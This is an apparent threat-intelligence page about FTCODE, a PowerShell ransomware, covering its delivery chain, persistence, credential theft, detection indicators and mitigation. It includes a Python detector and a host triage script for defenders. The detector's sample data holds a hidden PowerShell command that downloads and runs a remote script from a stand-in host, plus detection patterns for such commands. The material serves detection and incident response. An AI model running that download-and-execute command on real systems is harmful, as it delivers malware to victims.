FTCODE

Malware

⚠️ Overview

FTCODE is PowerShell-based ransomware. Sophos first documented it in 2013, when it was already a PowerShell script delivered by spam to Italian users, and it resurfaced in 2019 in Italian-language malspam campaigns analysed by Certego, Zscaler, Sophos and Trend Micro. It is not publicly attributed to a named threat group; the 2019 campaigns shared delivery infrastructure with the JasperLoader downloader. The payload runs entirely as a PowerShell script (no compiled executable is dropped), encrypts files and appends the .FTCODE extension, and versions seen from January 2020 also steal credentials saved in browsers and e-mail clients.

🔧 Technical Capabilities

FTCODE propagates via malicious spam (malspam) carrying either a Visual Basic Script (VBS) attachment or a weaponized Office document with a VBA macro; both stages do nothing more than launch PowerShell, which downloads the FTCODE script from a remote URL and runs it in memory. No software vulnerability is exploited; the chain depends entirely on the user opening the attachment and, for the document variant, enabling content. The script generates a per-victim password, derives an AES (Rijndael) key from it, and reports the password together with a victim identifier and basic host information to the command-and-control (C2) server over HTTP POST before encryption starts, so only the attacker's server ever holds the recovery key. Files are encrypted in place and renamed with the .FTCODE extension, and a ransom note named READ_ME_NOW.htm is dropped in affected directories. Persistence uses a scheduled task and a shortcut (.lnk) in the user's Startup folder, both of which re-launch a saved copy of the script with PowerShell. Version 1117.1, observed in January 2020, added theft of stored credentials from Internet Explorer, Mozilla Firefox, Google Chrome, Microsoft Outlook and Mozilla Thunderbird, so an infection is a credential compromise as well as a data-loss event. Because the whole payload is script, the durable forensic artifacts are the PowerShell command lines, the downloaded .ps1 and the persistence entries rather than a dropped binary.
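The delivery chain above is visible in ordinary process-creation telemetry: a script host or Office application spawning PowerShell with a command line that fetches and executes remote content. The following detector is an added example, not code from the original page or from any vendor report. It runs over constructed, Sysmon-style JSON event records embedded in the block; the parent list, command-line patterns, weights and alert threshold are this example's own assumptions about what a detection engineer would look for, not published FTCODE signatures.

```python
"""Score PowerShell launches for the FTCODE-style delivery chain.

Added example. Sample events are constructed; patterns and weights are
assumptions made for illustration, not a published signature set.
"""
import json
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (one JSON object per line).
# 4188 and 5100 model the malicious chain; 5002 is a benign admin script.
SAMPLE_EVENTS = r"""
{"pid": 4120, "image": "C:\\Windows\\System32\\wscript.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "wscript.exe C:\\Users\\mario\\Downloads\\fattura.vbs"}
{"pid": 4188, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\System32\\wscript.exe", "cmdline": "powershell.exe -w hidden -ep bypass -c iex((New-Object Net.WebClient).DownloadString('http://example.invalid/stage.txt'))"}
{"pid": 5002, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"}
{"pid": 5100, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "cmdline": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
"""

# Parents that should not spawn PowerShell in a normal user session (assumption).
SUSPICIOUS_PARENTS = {"wscript.exe", "cscript.exe", "winword.exe", "excel.exe", "outlook.exe"}
PARENT_WEIGHT = 3

# Command-line idioms used to fetch and run a remote script in memory.
# Each tuple is (pattern, weight, label); weights are assumptions.
CMDLINE_PATTERNS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2, "encoded command"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), 2, "remote download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), 2, "in-memory invoke"),
    (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1, "execution policy bypass"),
]
ALERT_THRESHOLD = 3  # a suspicious parent alone is enough to alert (assumption)


def analyse_events(jsonl: str) -> list[dict]:
    """Return one finding per PowerShell launch whose score reaches the threshold."""
    findings = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        image = PureWindowsPath(ev["image"]).name.lower()
        if image not in {"powershell.exe", "pwsh.exe"}:
            continue
        parent = PureWindowsPath(ev["parent"]).name.lower()
        score, reasons = 0, []
        if parent in SUSPICIOUS_PARENTS:
            score += PARENT_WEIGHT
            reasons.append(f"spawned by {parent}")
        for pattern, weight, label in CMDLINE_PATTERNS:
            if pattern.search(ev["cmdline"]):
                score += weight
                reasons.append(label)
        if score >= ALERT_THRESHOLD:
            findings.append({"pid": ev["pid"], "parent": parent, "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyse_events(SAMPLE_EVENTS):
        print(f"pid {finding['pid']} score {finding['score']}: {', '.join(finding['reasons'])}")
```

The parent check carries the most weight on purpose: the VBS and macro stages are disposable, but an Office or script-host process spawning PowerShell is rare in a managed estate and survives changes to the downloader's command line. The benign backup script (pid 5002) scores zero because it is launched from Explorer with a local file path and none of the remote-execution idioms.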

📜 History & Notable Incidents

FTCODE was first documented by Sophos in 2013 as a PowerShell ransomware script spread by spam to Italian users. It was largely absent from public reporting until the second half of 2019, when Certego described a new wave of Italian-language spam delivering it alongside the JasperLoader downloader; Sophos, Zscaler and Trend Micro followed with their own analyses of the same campaigns. In January 2020 Zscaler documented version 1117.1, which added theft of saved browser and e-mail credentials to the encryption routine. The campaigns have consistently targeted Italy. No law enforcement actions have specifically named FTCODE.

🔍 Detection Indicators

Because FTCODE is a script that is re-hosted and modified between campaigns, hashes of the downloaded .ps1 are short-lived and should be taken from current vendor reporting rather than a static list; the same applies to C2 domains and IP addresses, which rotate per campaign. Behavioural indicators are more durable: powershell.exe spawned by wscript.exe, winword.exe or excel.exe with a hidden window and a command line that downloads and invokes remote content (DownloadString, Invoke-WebRequest, Invoke-Expression or an encoded command); an outbound HTTP POST from PowerShell shortly after launch; creation of a scheduled task and of a .lnk in the user's Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) that launch PowerShell; mass file renames appending the .FTCODE extension; and READ_ME_NOW.htm ransom notes appearing in user directories.
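The file-system indicators above are what a responder checks first on a suspect host. The triage script below is an added example, not code from the original page or from any vendor: it builds a constructed victim profile in a temporary directory (three encrypted files, two ransom notes, one untouched file and two Startup shortcuts) and then walks it the way a responder would, counting .FTCODE files, locating READ_ME_NOW.htm notes and flagging Startup shortcuts whose target mentions PowerShell. The shortcut check is a byte-search heuristic over ANSI and UTF-16LE encodings rather than a full .lnk parser, the sample shortcuts are constructed stand-ins, and the shortcut file names are invented for the example.

```python
"""Host triage for FTCODE file-system artifacts.

Added example. The profile tree is constructed in a temp directory; the
.lnk files are stand-ins that embed a target string, not real shortcuts.
"""
import os
import tempfile
from pathlib import Path

RANSOM_NOTE = "READ_ME_NOW.htm"
ENCRYPTED_EXT = ".ftcode"
STARTUP_REL = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")


def build_sample_profile() -> Path:
    """Create a constructed victim profile and return its root path."""
    root = Path(tempfile.mkdtemp(prefix="ftcode-triage-"))
    note = "<html>constructed placeholder ransom note</html>"
    docs = root / "Documents"
    docs.mkdir()
    for name in ("budget.xlsx.FTCODE", "thesis.docx.FTCODE"):
        (docs / name).write_bytes(os.urandom(64))  # stands in for ciphertext
    (docs / RANSOM_NOTE).write_text(note)
    (docs / "notes.txt").write_text("untouched file")
    pics = root / "Pictures"
    pics.mkdir()
    (pics / "holiday.jpg.FTCODE").write_bytes(os.urandom(64))
    (pics / RANSOM_NOTE).write_text(note)
    startup = root / STARTUP_REL
    startup.mkdir(parents=True)
    # Stand-in shortcuts: the target string is stored as UTF-16LE, as it is
    # inside a real .lnk, but the surrounding structure is not reproduced.
    # Both shortcut names are invented for this example.
    bad_target = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -File C:\Users\x\AppData\Roaming\svc.ps1"
    (startup / "UpdateTask.lnk").write_bytes(b"L\x00\x00\x00" + bad_target.encode("utf-16-le"))
    good_target = r"C:\Program Files\OneNote\onenote.exe"
    (startup / "OneNote.lnk").write_bytes(b"L\x00\x00\x00" + good_target.encode("utf-16-le"))
    return root


def shortcut_launches_powershell(lnk: Path) -> bool:
    """Heuristic: look for 'powershell' in ANSI or UTF-16LE anywhere in the file."""
    data = lnk.read_bytes().lower()  # bytes.lower() leaves the \x00 bytes alone
    return b"powershell" in data or "powershell".encode("utf-16-le") in data


def triage(profile: Path) -> dict:
    """Walk a profile tree and summarise FTCODE-style artifacts."""
    encrypted, notes, suspicious_lnks = [], [], []
    for p in profile.rglob("*"):
        if not p.is_file():
            continue
        if p.suffix.lower() == ENCRYPTED_EXT:
            encrypted.append(p)
        elif p.name.lower() == RANSOM_NOTE.lower():
            notes.append(p)
    startup = profile / STARTUP_REL
    if startup.is_dir():
        suspicious_lnks = [l for l in startup.glob("*.lnk") if shortcut_launches_powershell(l)]
    return {
        "encrypted_files": len(encrypted),
        "ransom_notes": len(notes),
        "affected_dirs": sorted({str(p.parent.relative_to(profile)) for p in encrypted}),
        "startup_powershell_shortcuts": sorted(l.name for l in suspicious_lnks),
        "infected": bool(encrypted or notes),
    }


if __name__ == "__main__":
    print(triage(build_sample_profile()))
```

On a real host, point `triage` at each user profile under C:\Users and at any mapped shares the user could write to; the affected-directory list tells you how far encryption progressed, and a PowerShell-launching Startup shortcut means the script will run again at next logon unless it is removed together with the scheduled task.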

☠️ Risk & Impact

An FTCODE infection encrypts user data on the affected host and on any writable network shares, and, from version 1117.1 onward, also steals credentials saved in browsers and e-mail clients, which the attackers can reuse for account takeover or further phishing. Because the per-victim key is generated on the host and sent to the C2 before encryption begins, files are recoverable only with the attacker's cooperation or from backups. The script-only design means an infection can complete without a dropped executable for file-based antivirus to catch. Published reporting describes the campaigns as broadly targeting Italian users rather than any single sector.

🛡️ Mitigation

Defenders should block or quarantine macro-enabled Office attachments and script files (.vbs, .js) at the mail gateway, disable macros in files from the internet via Group Policy, and prevent wscript.exe and Office applications from spawning powershell.exe using application control or attack surface reduction rules. Enable PowerShell script block logging and module logging so that the downloaded script and its command line are recorded even when it runs only in memory, and alert on PowerShell launched with a hidden window, an encoded command or a remote-download idiom. The relevant MITRE ATT&CK techniques are T1566.001 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1059.001 (Command and Scripting Interpreter: PowerShell), T1053.005 (Scheduled Task), T1547.001 (Registry Run Keys / Startup Folder), T1555.003 (Credentials from Web Browsers) and T1486 (Data Encrypted for Impact). Maintain offline backups, since the decryption key exists only on the attacker's server, and treat every infection as a credential-reset event for the affected user's browser and e-mail accounts.


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information are the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.